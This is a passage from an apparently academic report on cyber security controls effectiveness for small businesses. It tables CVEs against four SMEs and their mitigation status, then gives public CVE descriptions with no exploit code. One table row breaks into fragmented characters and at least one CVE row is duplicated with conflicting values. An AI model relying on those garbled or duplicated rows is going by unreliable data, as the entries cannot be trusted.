CVE-2013-6979 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-6994 | n | n | y | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-7004 | y | n | n | y | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Firmware Management
CVE-2013-7043 | n | n | n | y | n | Not Mitigated | Partially Mitigated - Firmware Management
CVE-2013-7389 | y | n | n | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Firmware Management
CVE-2014-0001 | y | n | y | n | n | Not Mitigated | Mitigated - Boundary Firewalls include anti-DOS
CVE-2014-0035 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management & SSL
CVE-2014-0160 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0207 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management & SSL
CVE-2014-0232 | y | y | y | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0259 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection & Patch Management
CVE-2014-0266 | y | y | y | n | y | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0294 | n | n | y | n | y | Not Mitigated | Mitigated - Secure Configuration, Anti-Malware
CVE-2014-0313 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0354 | y | n | n | y | n | Not Mitigated | Mitigated - Secure Configuration, Firmware Management
CVE-2014-0362 | y | y | y | y | n | Not Mitigated | Mitigated - Patch Management & Secure Configuration (Secure Browser & Web Hosting)
CVE-2014-0433 | y | y | y | n | y | Not Mitigated | Mitigated - Patch Management
CVE-2014-0488 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware
CVE-2014-0493 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0494 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0498 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0515 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0533 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0536 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0562 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0577 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0765 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0767 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0783 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Port closing)
CVE-2014-1330 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Website Blacklisting
CVE-2014-1342 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Website Blacklisting
CVE-2014-1349 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Access Control
CVE-2014-1356 | y | y | y | y | y | Not Mitigated | Mitigated - Secure Configuration, Malware Protection, Patch Management
CVE-2014-1370 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection, Patch Management
CVE-2014-1379 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection, Patch Management
CVE-2014-1379 | n | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Anti-Malware
CVE-2014-1382 | y | y | y | y | y | Not Mitigated | Mitigated - Website Blacklist, Patch Management
CVE-2014-1466 | y | n | n | n | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-1472 | y | n | n | n | n | Not Mitigated | Mitigated - Website Blacklist, Patch Management
CVE-2014-1477 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1518 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1563 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1565 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1586 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1701 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-1740 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1744 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1753 | y | n | y | y | y | Not Mitigated | Mitigated - Website Blacklisting & Patch Management
CVE-2014-1806 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1808 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Website Blacklisting & Patch Management
CVE-2014-1811 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall
CVE-2014-1812 | y | y | y | y | y | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-2014 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-2103 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti DOS
CVE-2014-2109 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-2364 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-2416 | n | y | y | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-2554 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management, Access Control, Website Blacklisting
CVE-2014-2643 | n | y | n | n | n | Not Mitigated | Mitigated - Patch Management, Strong Passwords (User Access)
CVE-2014-2742 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti DOS
CVE-2014-2768 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2789 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2791 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2794 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2808 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2821 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-3444 | n | n | n | y | n | Not Mitigated | Mitigated - Anti-Malware, Patch Management
CVE-2014-3489 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-3507 | n | n | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-3556 | y | n | y | n | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-3580 | y | y | y | n | n | Not Mitigated | Mitigated - Firewall, Anti DOS, Patch Management
CVE-2014-3814 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-3819 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti-Dos, Firmware Updates
CVE-2014-3872 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration & Patch Management
CVE-2014-4044 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-4079 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4082 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4100 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4105 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4114 | y | y | y | y | n | Not Mitigated | Mitigated - Anti-Malware
CVE-2014-4127 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4130 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4132 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2
01
4-4
13
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 17 of 28
CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE
CVE-2014-4141 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4481 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Anti-Malware
CVE-2014-4617 | y | y | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-4631 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration
CVE-2014-6040 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-6105 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-6136 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-6363 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-6369 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-6378 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-6487 | n | n | y | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-7250 | n | y | y | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-7927 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall, Secure Configuration (Access Control), Patch Management
CVE-2014-7945 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-8447 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management
CVE-2014-8638 | y | y | y | y | y | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-8835 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-9159 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay]
CVE-2014-9163 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay]
CVE-2014-9350 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall Anti-Dos, Firmware Updates
CVE-2014-9357 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware, Secure Configuration
CVE Details
CVE-2013-0008: win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle window broadcast messages, which allows local users to gain privileges via a crafted application, aka "Win32k Improper Message Handling Vulnerability".
CVE-2013-0022: Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer LsGetTrailInfo Use After Free Vulnerability".
CVE-2013-0084: Directory traversal vulnerability in Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP1 allows remote attackers to bypass intended read restrictions for content, and hijack user accounts, via a crafted URL, aka "SharePoint Directory Traversal Vulnerability".
CVE-2013-0140: SQL injection vulnerability in the Agent-Handler component in McAfee ePolicy Orchestrator (ePO) before 4.5.7 and 4.6.x before 4.6.6 allows remote attackers to execute arbitrary SQL commands via a crafted request over the Agent-Server communication channel.
CVE-2013-0149: The OSPF implementation in Cisco IOS 12.0 through 12.4 and 15.0 through 15.3, IOS-XE 2.x through 3.9.xS, ASA and PIX 7.x through 9.1, FWSM, NX-OS, and StarOS before 14.0.50488 does not properly validate Link State Advertisement (LSA) type 1 packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a (1) unicast or (2) multicast packet, aka Bug IDs CSCug34485, CSCug34469, CSCug39762, CSCug63304, and CSCug39795.
CVE-2013-0172: Samba 4.0.x before 4.0.1, in certain Active Directory domain-controller configurations, does not properly interpret Access Control Entries that are based on an objectClass, which allows remote authenticated users to bypass intended restrictions on modifying LDAP directory objects by leveraging (1) objectClass access by a user, (2) objectClass access by a group, or (3) write access to an attribute.
CVE-2013-0174: The external node classifier (ENC) API in Foreman before 1.1 allows remote attackers to obtain the hashed root password via an API request.
CVE-2013-0199: The default LDAP ACIs in FreeIPA 3.0 before 3.1.2 do not restrict access to the (1) ipaNTTrustAuthIncoming and (2) ipaNTTrustAuthOutgoing attributes, which allow remote attackers to obtain the Cross-Realm Kerberos Trust key via unspecified vectors.
CVE-2013-0253: The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.
CVE-2013-0270: OpenStack Keystone Grizzly before 2013.1, Folsom, and possibly earlier allows remote attackers to cause a denial of service (CPU and memory consumption) via a large HTTP request, as demonstrated by a long tenant name when requesting a token.
CVE-2013-0481: The console in IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 and 2.2 allows remote attackers to read stack traces by triggering (1) an error or (2) an exception.
CVE-2013-0598: Cross-site request forgery (CSRF) vulnerability in the Web Client in IBM Rational ClearQuest 7.1 before 7.1.2.12, 8.0 before 8.0.0.8, and 8.0.1 before 8.0.1.1 allows remote attackers to hijack the authentication of arbitrary users.
CVE-2013-0619: Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11.x before 11.0.1 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-1530, CVE-2013-0601, CVE-2013-0605, CVE-2013-0616, CVE-2013-0620, and CVE-2013-0623.
CVE-2013-0633: Buffer overflow in Adobe Flash Player before 10.3.183.51 and 11.x before 11.5.502.149 on Windows and Mac OS X, before 10.3.183.51 and 11.x before 11.2.202.262 on Linux, before 11.1.111.32 on Android 2.x and 3.x, and before 11.1.115.37 on Android 4.x allows remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013.
CVE-2013-0649: Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0644 and CVE-2013-1374.
CVE-2013-0746: Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 do not properly implement quickstubs that use the jsval data type for their return values, which allows remote attackers to execute arbitrary code or cause a denial of service (compartment mismatch and application crash) via crafted JavaScript code that is not properly handled during garbage collection.
CVE-2013-0753: Use-after-free vulnerability in the serializeToStream implementation in the XMLSerializer component in Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 allows remote attackers to execute arbitrary code via crafted web content.
CVE-2013-0787: Use-after-free vulnerability in the nsEditor::IsPreformatted function in editor/libeditor/base/nsEditor.cpp in Mozilla Firefox before 19.0.2, Firefox ESR 17.x before 17.0.4, Thunderbird before 17.0.4, Thunderbird ESR 17.x before 17.0.4, and SeaMonkey before 2.16.1 allows remote attackers to execute arbitrary code via vectors involving an execCommand call.
CVE-2013-0909: The XSS Auditor in Google Chrome before 25.0.1364.152 allows remote attackers to obtain sensitive HTTP Referer information via unspecified vectors.
CVE-2013-1035: The iTunes ActiveX control in Apple iTunes before 11.1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.
CVE-2013-1102: The Wireless Intrusion Prevention System (wIPS) component on Cisco Wireless LAN Controller (WLC) devices with software 7.0 before 7.0.235.0, 7.1, 7.2 before 7.2.110.0, and 7.3 before 7.3.101.0 allows remote attackers to cause a denial of service (device reload) via crafted IP packets, aka Bug ID CSCtx80743.
CVE-2013-1140: The XML parser in Cisco Security Monitoring, Analysis, and Response System (MARS) allows remote attackers to read arbitrary files via an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue, aka Bug ID CSCue55093.
CVE-2013-1144: Memory leak in the IKEv1 implementation in Cisco IOS 15.1 allows remote attackers to cause a denial of service (memory consumption) via unspecified (1) IPv4 or (2) IPv6 IKE packets, aka Bug ID CSCth81055.
CVE-2013-1153: Cross-site request forgery (CSRF) vulnerability in the web interface in Cisco Prime Infrastructure allows remote attackers to hijack the authentication of arbitrary users, aka Bug ID CSCue84676.
CVE-2013-1181: Cisco NX-OS on Nexus 5500 devices 4.x and 5.x before 5.0(3)N2(2), Nexus 3000 devices 5.x before 5.0(3)U3(2), and Unified Computing System (UCS) 6200 devices before 2.0(1w) allows remote attackers to cause a denial of service (device reload) by sending a jumbo packet to the management interface, aka Bug IDs CSCtx17544, CSCts10593, and CSCtx95389.
CVE-2013-1303: Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability", a different vulnerability than CVE-2013-1304 and CVE-2013-1338.
CVE-2013-1384: Adobe Shockwave Player before 12.0.2.122 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-1386.
CVE-2013-1388: Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 10, 9.0.1 before Update 9, 9.0.2 before Update 4, and 10 before Update 9 allows attackers to obtain administrator-console access via unknown vectors.
CVE-2013-1450: Microsoft Internet Explorer 8 and 9, when the Proxy Settings configuration has the same Proxy address and Port values in the HTTP and Secure rows, does not properly reuse TCP sessions to the proxy server, which allows remote attackers to obtain sensitive information intended for a specific host via a crafted HTML document that triggers many HTTPS requests and then triggers an HTTP request to that host, as demonstrated by reading a Cookie header, aka MSRC 12096gd.
CVE-2013-1472: Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 2.2.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than other CVEs listed in the February 2013 CPU.
CVE-2013-1553: Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 11.1.1.6.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Web Services Security.
CVE-2013-1620: The TLS implementation in Mozilla Network Security Services (NSS) does not properly consider timing side-channel attacks on a noncompliant MAC check operation during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, a related issue to CVE-2013-0169.
CVE-2013-1627: Absolute path traversal vulnerability in NTWebServer.exe in Indusoft Studio 7.0 and earlier and Advantech Studio 7.0 and earlier allows remote attackers to read arbitrary files via a full pathname in an argument to the sub_401A90 CreateFileW function.
CVE-2013-1638: Opera before 12.13 allows remote attackers to execute arbitrary code via crafted clipPaths in an SVG document.
CVE-2013-1669: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 21.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2013-1676: The SelectionIterator::GetNextSegment function in Mozilla Firefox before 21.0, Firefox ESR 17.x before 17.0.6, Thunderbird before 17.0.6, and Thunderbird ESR 17.x before 17.0.6 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds read) via unspecified vectors.
CVE-2013-1700: The Mozilla Maintenance Service in Mozilla Firefox before 22.0 on Windows does not properly handle inability to launch the Mozilla Updater executable file, which allows local users to gain privileges via vectors involving placement of a Trojan horse executable file at an arbitrary location.
CVE-2013-1734: Cross-site request forgery (CSRF) vulnerability in attachment.cgi in Bugzilla 2.x, 3.x, and 4.0.x before 4.0.11; 4.1.x and 4.2.x before 4.2.7; and 4.3.x and 4.4.x before 4.4.1 allows remote attackers to hijack the authentication of arbitrary users for requests that commit an attachment change via an update action.
CVE-2013-1777: The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not properly implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.
CVE-2013-2319: FileMaker Pro before 12 and Pro Advanced before 12 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.
CVE-2013-2340: Unspecified vulnerability on the HP ProCurve JCA, JCB, JDA, JDB, JEA, JFA, JFB, JFC, JGA, 658250-B21, and 658247-B21; HP 3COM routers and switches; and HP H3C routers and switches allows remote attackers to execute arbitrary code or obtain sensitive information via unknown vectors.
CVE-2013-2350: Unspecified vulnerability in HP Storage Data Protector 6.2X allows remote attackers to execute arbitrary code or cause a denial of service via unknown vectors, aka ZDI-CAN-1897.
CVE-2013-2492: Stack-based buffer overflow in Firebird 2.1.3 through 2.1.5 before 18514, and 2.5.1 through 2.5.3 before 26623, on Windows allows remote attackers to execute arbitrary code via a crafted packet to TCP port 3050, related to a missing size check during extraction of a group number from CNCT information.
CVE-2013-2507: Multiple cross-site scripting (XSS) vulnerabilities in the Brother MFC-9970CDW printer with firmware G (1.03) allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to admin/log_to_net.html or (2) kind parameter to fax/copy_settings.html, a different vulnerability than CVE-2013-2670 and CVE-2013-2671.
CVE-2013-2736: Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2718, CVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2725, CVE-2013-2726, CVE-2013-2731, CVE-2013-2732, CVE-2013-2734, CVE-2013-2735, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339, CVE-2013-3340, and CVE-2013-3341.
CVE-2013-2780: Siemens SIMATIC S7-1200 PLCs 2.x and 3.x allow remote attackers to cause a denial of service (defect-mode transition and control outage) via crafted packets to UDP port 161 (aka the SNMP port).
CVE-2013-2803: ProSoft RadioLinx ControlScape before 6.00.040 uses a deficient PRNG algorithm and seeding strategy for passphrases, which makes it easier for remote attackers to obtain access via a brute-force attack.
CVE-2013-2824: Schneider Electric StruxureWare SCADA Expert Vijeo Citect 7.40, Vijeo Citect 7.20 through 7.30SP1, CitectSCADA 7.20 through 7.30SP1, StruxureWare PowerSCADA Expert 7.30 through 7.30SR1, and PowerLogic SCADA 7.20 through 7.20SR1 do not properly handle exceptions, which allows remote attackers to cause a denial of service via a crafted packet.
CVE-2013-2826: WellinTech KingSCADA before 3.1.2, KingAlarm&Event before 3.1, and KingGraphic before 3.1.2 perform authentication on the KAEClientManager console rather than on the server, which allows remote attackers to bypass intended access restrictions and discover credentials via a crafted packet to TCP port 8130.
CVE-2013-2920: The DoResolveRelativeHost function in url/url_canon_relative.cc in Google Chrome before 30.0.1599.66 allows remote attackers to cause a denial of service (out-of-bounds read) via a relative URL containing a hostname, as demonstrated by a protocol-relative URL beginning with a www.google.com substring.
CVE-2013-3064: Open redirect vulnerability in ui/dynamic/unsecured.html in Linksys EA6500 with firmware 1.1.28.147876 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the target parameter.
CVE-2013-3116: Microsoft Internet Explorer 7 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2013-3137: Microsoft FrontPage 2003 SP3 does not properly parse DTDs, which allows remote attackers to obtain sensitive information via crafted XML data in a FrontPage document, aka "XML Disclosure Vulnerability".
CVE-2013-3194: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2013-3199: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2013-3201: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2013-3203, CVE-2013-3206, CVE-2013-3207, and CVE-2013-3209.
CVE-2013-3206: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2013-3201, CVE-2013-3203, CVE-2013-3207, and CVE-2013-3209.
CVE-2013-3280: EMC RSA Authentication Agent 7.1.x before 7.1.2 for Web for Internet Information Services has a fail-open design, which allows remote attackers to bypass intended access restrictions via vectors that trigger an agent crash.
CVE-2013-3387: Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance 8.6 and 9.x before 9.2(1) allows remote attackers to cause a denial of service (disk consumption) via a flood of TCP packets to port 5400, leading to large error-log files, aka Bug ID CSCua42724.
CVE-2013-3417: The administrative web interface in Cisco Video Surveillance Operations Manager does not properly perform authentication, which allows remote attackers to watch video feeds via a crafted URL, aka Bug ID CSCtg72262.
CVE-2013-3632: The Cron service in rpc.php in OpenMediaVault allows remote authenticated users to execute cron jobs as arbitrary users and execute arbitrary commands via the username parameter.
CVE-2013-3656: Cybozu Office 9.1.0 and earlier does not properly manage sessions, which allows remote attackers to bypass authentication by leveraging knowledge of a login URL.
CVE-2013-3856: Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability".
CVE-2013-3860: Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, and 4.5 does not properly parse a DTD during XML digital-signature validation, which allows remote attackers to cause a denial of service (application crash or hang) via a crafted signed XML document, aka "Entity Expansion Vulnerability".
CVE-2013-3893: Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help: URL that triggers loading of hxds.dll.
CVE-2013-3897: Use-after-free vulnerability in the CDisplayPointer class in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted JavaScript code that uses the onpropertychange event handler, as exploited in the wild in September and October 2013, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2013-3900: The WinVerifyTrust function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not properly validate PE file digests during Authenticode signature verification, which allows remote attackers to execute arbitrary code via a crafted PE file, aka "WinVerifyTrust Signature Validation Vulnerability".
CVE-2013-3905: Microsoft Outlook 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT does not properly expand metadata contained in S/MIME certificates, which allows remote attackers to obtain sensitive network configuration and state information via a crafted certificate in an e-mail message, aka "S/MIME AIA Vulnerability".
CVE-2013-4223: The Gentoo Nullmailer package before 1.11-r2 uses world-readable permissions for /etc/nullmailer/remotes, which allows local users to obtain SMTP authentication credentials by reading the file.
CVE-2013-4436: The default configuration for salt-ssh in Salt (aka SaltStack) 0.17.0 does not validate the SSH host key of requests, which allows remote attackers to have unspecified impact via a man-in-the-middle (MITM) attack.
CVE-2013-4478: Sup before 0.13.2.1 and 0.14.x before 0.14.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the filename of an email attachment.
CVE-2013-4529: Buffer overflow in hw/pci/pcie_aer.c in QEMU before 1.7.2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a large log_num value in a savevm image.
CVE-2013-4555: Cross-site request forgery (CSRF) vulnerability in ecrire/action/logout.php in SPIP before 2.1.24 allows remote attackers to hijack the authentication of arbitrary users for requests that logout the user via unspecified vectors.
CVE-2013-4776: NETGEAR ProSafe GS724Tv3 and GS716Tv2 with firmware 5.4.1.13 and earlier, GS748Tv4 5.4.1.14, and GS510TP 5.0.4.4 allows remote attackers to cause a denial of service (reboot or crash) via a crafted HTTP request to /filesystem.
CVE-2013-4782: The Supermicro BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.
CVE-2013-5057: hxds.dll in Microsoft Office 2007 SP3 and 2010 SP1 and SP2 does not implement the ASLR protection mechanism, which makes it easier for remote attackers to execute arbitrary code via a crafted COM component on a web site that is visited with Internet Explorer, as exploited in the wild in December 2013, aka "HXDS ASLR Vulnerability".
CVE-2013-5369: IBM SPSS Analytical Decision Management 6.1 before IF1, 6.2 before IF1, and 7.0 before FP1 IF6 might allow remote attackers to execute arbitrary code by deploying and accessing a service.
